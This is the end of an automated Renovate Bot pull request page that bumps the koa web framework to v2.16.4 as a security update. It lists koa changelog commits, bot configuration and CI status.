\[[`6e1093b`](http://github.com/koajs/koa/commit/6e1093be27b41135c8e67fce108743d54e9cab67)] - docs: remove babel from readme ([#&#8203;1494](https://github.com/koajs/koa/issues/1494)) (miwnwski <<m@iwnw.ski>>) - \[[`38cb591`](http://github.com/koajs/koa/commit/38cb591254ff5f65a04e8fb57be293afe697c46e)] - docs: update specific for auto response status (AlbertAZ1992 <<ziyuximing@163.com>>) - \[[`2224cd9`](http://github.com/koajs/koa/commit/2224cd9b6a648e7ac2eb27eac332e7d6de7db26c)] - docs: remove babel ref. ([#&#8203;1488](https://github.com/koajs/koa/issues/1488)) (Imed Jaberi <<imed_jebari@hotmail.fr>>) - \[[`d51f983`](http://github.com/koajs/koa/commit/d51f98328c3b84493cc6bda0732aabb69e20e3a1)] - docs: fix assert example for response ([#&#8203;1489](https://github.com/koajs/koa/issues/1489)) (Imed Jaberi <<imed_jebari@hotmail.fr>>) - \[[`f8b49b8`](http://github.com/koajs/koa/commit/f8b49b859363ad6c3d9ea5c11ee62341407ceafd)] - chore: fix grammatical and spelling errors in comments and tests ([#&#8203;1490](https://github.com/koajs/koa/issues/1490)) (Matt Kubej <<mkubej@gmail.com>>) - \[[`d1c9263`](http://github.com/koajs/koa/commit/d1c92638c95d799df2fdff5576b96fc43a62813f)] - deps: update depd >> v2.0.0 ([#&#8203;1482](https://github.com/koajs/koa/issues/1482)) (imed jaberi <<imed_jebari@hotmail.fr>>) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR has been generated by [Renovate Bot](https://github.com/renovatebot/renovate). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMTAuMTUiLCJ1cGRhdGVkSW5WZXIiOiI0My4xMTAuMTUiLCJ0YXJnZXRCcmFuY2giOiJtYWluIiwibGFiZWxzIjpbXX0=-->
Update dependency koa to v2.16.4 [SECURITY]
Some checks failed
ci / build-image (pull_request) Successful in 1m7s
Details
ci / test-image (pull_request) Failing after 6s
Details
b77a7ec936
jonathan deleted branch renovate/npm-koa-vulnerability 2026-04-20 19:18:53 +00:00
Sign in to join this conversation.
Reviewers
No reviewers
Labels
Clear labels
No items
No labels
Milestone
Clear milestone
No items
No milestone
Projects
Clear projects
No items
No project
Assignees
Clear assignees
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference
jonathan/combine.fm!32
No description provided.